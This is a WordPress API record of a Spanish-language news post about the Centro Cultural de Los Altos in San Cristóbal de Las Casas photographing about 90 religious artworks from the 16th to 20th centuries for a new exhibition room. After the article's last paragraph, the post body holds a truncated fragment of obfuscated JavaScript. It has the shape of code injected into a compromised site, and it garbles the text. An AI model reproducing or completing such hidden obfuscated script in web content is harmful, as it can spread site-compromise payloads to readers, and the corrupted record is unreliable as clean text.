{"id":16122,"date":"2024-06-15T01:49:04","date_gmt":"2024-06-15T01:49:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16122"},"modified":"2024-06-15T01:49:04","modified_gmt":"2024-06-15T01:49:04","slug":"inicia-fijacion-de-imagen-para-la-nueva-sala-de-historia-y-arte-religioso-en-el-centro-cultural-de-los-altos-i","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16122","title":{"rendered":"Inicia fijaci\u00f3n de imagen para la nueva sala de Historia y Arte Religioso en el Centro Cultural de Los Altos I"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"529\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240614-WA0033.jpg\" alt=\"\" class=\"wp-image-16123\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240614-WA0033.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240614-WA0033-300x220.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>14 de junio del 2024. San Crist\u00f3bal de Las Casas.- El Centro Cultural de Los Altos, ubicado a un costado del templo de Santo Domingo de Guzm\u00e1n, ha comenzado el procedimiento de fijaci\u00f3n de imagen de la colecci\u00f3n que integrar\u00e1 el guion curatorial de la nueva sala de Historia y Arte Religioso. Este esfuerzo se ha logrado gracias a las facilidades proporcionadas por la maestra Olivia Lara Jim\u00e9nez, directora del INAH Chiapas, y el arque\u00f3logo Andr\u00e9s Brizuela Casimir, director del Museo Regional de Chiapas, quienes atendieron este importante tema pendiente de nuestras colecciones, inform\u00f3 el centro a trav\u00e9s de un comunicado.<\/p>\n\n\n\n<p>El centro detall\u00f3 que esta tarea estar\u00e1 a cargo de la fot\u00f3grafa Mayra Castillo Badal, con la colaboraci\u00f3n de la restauradora Nayeli Pacheco Pedraza. El apoyo t\u00e9cnico ser\u00e1 proporcionado por el custodio Sergio Patricio L\u00f3pez Valencia, el ingeniero Alberto Estrada Garc\u00eda, jefe de Seguridad, y la direcci\u00f3n del Centro Cultural.<\/p>\n\n\n\n<p>&#8220;La primera meta del proyecto es el registro fotogr\u00e1fico de aproximadamente 90 piezas que datan de los siglos XVI al XX. Este avance es significativo dentro de la actualizaci\u00f3n fotogr\u00e1fica del Sistema de Inventarios y de Registro Institucional, y fortalece el trabajo asignado al titular de museograf\u00eda del centro&#8221;.<\/p>\n\n\n\n<p>Adem\u00e1s, este registro fotogr\u00e1fico permitir\u00e1 dar continuidad a los procesos de difusi\u00f3n en redes sociales y de divulgaci\u00f3n del patrimonio hist\u00f3rico que resguarda el recinto, asegurando que el legado cultural sea accesible y conocido por un p\u00fablico m\u00e1s amplio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 14 de junio del 2024. San Crist\u00f3bal de Las Casas.- El Centro Cultural de Los Altos, ubicado a un costado del templo de Santo Domingo de Guzm\u00e1n, ha comenzado el procedimiento de fijaci\u00f3n de imagen de la colecci\u00f3n que integrar\u00e1 el guion curatorial de la nueva sala de Historia y Arte Religioso. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-16122","post","type-post","status-publish","format-standard","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16122"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16122\/revisions"}],"predecessor-version":[{"id":16124,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16122\/revisions\/16124"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}